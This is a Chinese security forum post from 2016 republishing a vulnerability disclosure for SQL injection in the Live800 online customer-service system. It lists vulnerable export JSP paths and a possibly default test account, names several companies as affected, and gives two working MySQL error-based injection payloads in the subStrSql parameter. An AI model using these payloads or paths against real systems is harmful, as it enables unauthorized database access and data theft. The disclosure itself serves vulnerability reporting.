HanDs
管理员

[7月漏洞公开] Live800在线客服系统SQL注入 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

Live800为全球中高端企业客户提供在线营销、在线客服解决方案。
某处前台无需登录sql注入。

详细说明:

看了下发现live800所有导出功能都是通过sql查询实现的。



/new_sta/export/chatHoursSta.jsp

/sta/export/chatOpSta.jsp

/new_sta/export/chatOpSta.jsp

整理可能有遗漏,后台登录后所有导出功能应该都可以产生任意sql执行。

另外如果修复了sta文件夹下的,顺便也应该修复new_sta文件夹下,文件都一样。



另外dingqiang这个用户是系统自带的测试账号么? 感觉每个系统都有这个用户,如果是的话应该建议用户修改这个测试账号密码。

漏洞证明:

测试url:

长安汽车:http://**.**.**.**/live800/sta/export/chatOpSta.jsp

博威:http://**.**.**.**:8080/live800/

顺丰:http://**.**.**.**:8080/live800/

金蝶:http://**.**.**.**/live800/

易宝支付:http://**.**.**.**/live800/



针对mysql数据库的测试payload:

code 区域
export=txt&companyId=1&subStrSql=(select  (select 1 from  (select count(*),concat(user(),floor(rand(0)*2))x from  information_schema.tables group by x)a))





code 区域
export=txt&companyId=1&subStrSql=EXTRACTVALUE(1,CONCAT(0x5c,(MID((IFNULL(CAST(user() AS CHAR),0x20)),1,21))))





测试截图:

长安汽车:

14607120200695.jpg





顺丰:

sf.png





博威:

**.**.**.**.png





金蝶:

kingdee.png





易宝支付:

yeepay.png

修复方案:

过滤。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
Live800 在线客服系统 SQL 注入
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:0
游客组
快速回复